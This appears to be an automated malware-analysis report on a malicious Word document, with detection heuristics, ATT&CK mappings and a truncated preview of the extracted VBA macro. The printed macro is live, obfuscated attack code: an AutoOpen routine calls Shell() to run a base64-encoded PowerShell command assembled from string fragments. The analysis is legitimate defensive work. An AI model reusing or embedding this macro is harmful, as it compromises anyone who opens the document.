MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection and multiple VBA heuristic firings confirm its malicious nature.
Heuristics 7
-
ClamAV: Doc.Malware.Valyria-6884775-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6884775-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12060 bytes |
SHA-256: a634173f7e9323da9bcda05e24ec0e3c574b83bfb4e3e6abd095f05a32cd623a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "FCWHLowuhS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IwmLQYzjw()
On Error Resume Next
For iSMzR = YYYoKM To drfmDk
For wVsJvX = rLBwV To 29841
uAwOZ = (3309 / CBool(czQEij) - ZZvjoc / Oct(42764 / Hex(24791) / CBtjhN + Rnd(pozOi / Fix(37))))
Next
jYdiBU = 47955 - 53461
Next
For RrRRl = Sjmwh To tMfSPP
For bPjRL = pWCGbC To 76835
zjCRPb = (33140 / CBool(HKQBQ) - MzQlEz / Oct(1401 / Hex(80441) / ZFjvjP + Rnd(Lwtcwd / Fix(37))))
Next
BAoIDH = 42413 - 2567
Next
IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726)
For SzKEp = zozHwc To jfhHh
For UHotjU = lPqzi To 28649
vQwZK = (70730 / CBool(wFioi) - pUJav / Oct(51178 / Hex(43603) / DiGbkb + Rnd(hzAZj / Fix(37))))
Next
PPjIz = 93075 - 57705
Next
End Function
Sub Autoopen()
On Error Resume Next
For CJEET = RGQBH To rsmpza
For QQHiP = wZEaSw To 58103
KAUBWQ = (3590 / CBool(bhzRrN) - ctKXm / Oct(25208 / Hex(11153) / ipKXzM + Rnd(wDdzjr / Fix(37))))
Next
obJHd = 79121 - 49381
Next
IwmLQYzjw
For zCjCcj = arfEF To LMtCau
For wosjfK = jNijQ To 40798
rHozkz = (82390 / CBool(lTblbc) - QFDuq / Oct(67423 / Hex(16672) / CWRcX + Rnd(Mwokq / Fix(37))))
Next
EFFpv = 86179 - 38706
Next
End Sub
Attribute VB_Name = "YEuicVz"
Function svfBDnAPGfM()
On Error Resume Next
For IkKiR = nQKQr To ISJilj
For pzisuH = NnoCq To 67518
PuvEX = (68271 / CBool(BwKYuc) - zQhRF / Oct(91292 / Hex(98871) / isPaA + Rnd(zbHZIh / Fix(37))))
Next
XNdOzC = 77630 - 6823
Next
hdJQzb = "HeLL -e KAAgAG4" + "AZQB3AC0AbwBiAE" + "oAZQBDAFQAIABp" + "AE8ALgBDAG" + "8AbQBQA" + "HIARQBzAFMAS" + "QBvAG4ALgBEA" + "GUAZgBsAGEAdABl" + "AFMAVAByA" + "GUA"
For TAiON = HllnL To QDowj
For BUCwlv = bCDDF To 86251
AKYPw = (73568 / CBool(cUWnUV) - HKoRQU / Oct(74589 / Hex(67467) / UOiDl + Rnd(DhfuA / Fix(37))))
Next
FiZAw = 7990 - 48351
Next
VOozGpJ = "YQBNACg" + "AWwBpAG8ALgBNA" + "EUAbQBPAHIAeQ" + "BzAHQAUgBlA" + "EEAbQBdAFs" + "AYwBPAG4AdgBlA" + "FIAdABdAD" + "oAOgBm" + "AHIATw"
For fLRZi = sOlpY To RtDAN
For sIQpHZ = UBfPR To 37642
NjlJz = (17189 / CBool(Rbpvq) - cuMaY / Oct(75356 / Hex(26667) / QjqDr + Rnd(JSMzU / Fix(37))))
Next
IKiIu = 6483 - 8418
Next
zHzKtqlnjK = "BNAEIAQQBz" + "AGUANgA0AFMAVA" + "ByAG" + "kAbg" + "BHACgAIAAnAFYAW" + "gB" + "CAH"
For ajbtR = tapFq To FEwzuG
For EOwOp = UMRMEj To 41476
DkkIwl = (76321 / CBool(jdHJq) - ENiNo / Oct(95281 / Hex(99740) / cRlTwq + Rnd(NkZUvC / Fix(37))))
Next
MrzUS = 87629 - 59881
Next
mVARHQcU = "QAUwA4AE4A" + "QQBEAE0AZQA" + "vAHkAc" + "gAwAG" + "8AdABN" + "AFAAdAB" + "qAGoAbQB"
For HjjEI = iqsYi To ISWdp
For iWsiov = lArPT To 60408
QGKEj = (85127 / CBool(YjtjwM) - KuUTiV / Oct(20599 / Hex(17034) / ZsnqWC + Rnd(bYscsB / Fix(37))))
Next
RuwOK = 74684 - 98151
Next
jowAJR = "mAHMA" + "QQBnACsAbwA0AD" + "QATgB" + "wA"
For rjUaG = woKvH To kMvBLV
For SIEjBJ = CZiHAW To 56555
AEWww = (31538 / CBool(jihkXX) - zvCoq / Oct(61976 / Hex(85212) / ASRTTW + Rnd(CvlAM / Fix(37))))
Next
rfPZj = 76783 - 49062
Next
LkChSPa = "GMA" + "cQBtAEMAS" + "ABLADkAWgB0AHQA" + "dAAxADAAdgBYAG" + "kAK" + "wBzAGUAMgBI"
svfBDnAPGfM = hdJQzb + VOozGpJ + zHzKtqlnjK + mVARHQcU + jowAJR + LkChSPa
End Function
Function nIczik()
On Error Resume Next
For CQlPw = mFLfzj To EDfdw
For cflzW = rHPmP To 19582
SSzBfD = (41525 / CBool(UzjFDf) - nbkwj / Oct(61268 / Hex(94527) / QROEGS + Rnd(SwVEN / Fix(37))))
Next
GBzZbL = 16042 - 65379
Next
CKYSzAoi = "AGYAMwAxAEs" + "AcgA0AEoAcABE" + "ADgAawB2" + "AHoAegBUADcA" + "QQB3AEoA" + "cAArAHoA" + "RQAyAGEAaA" + "BhA"
For tSfrU = CS
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.